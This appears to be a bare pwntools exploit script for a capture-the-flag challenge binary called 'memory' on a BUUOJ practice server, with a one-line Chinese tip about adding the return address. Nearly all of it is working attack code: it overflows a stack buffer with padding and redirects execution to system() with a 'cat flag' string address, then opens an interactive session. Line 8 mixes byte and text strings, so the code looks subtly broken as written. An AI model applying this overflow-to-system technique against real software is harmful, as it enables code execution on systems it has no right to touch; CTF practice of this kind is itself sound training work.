1. from pwn import*
    2. context.log_level = 'debug'
    3. io = remote("node4.buuoj.cn",25832)
    4. #io = process('./memory')
    5. elf = ELF('./memory')
    6. system_addr =elf.sym['system']
    7. cat_flag = 0x80487e0
    8. payload = 0x13*b'a'+'aaaa'+p32(system_addr)+p32(system_addr)+p32(cat_flag)
    9. io.sendline(payload)
    10. io.interactive()

    记得加返回地址就行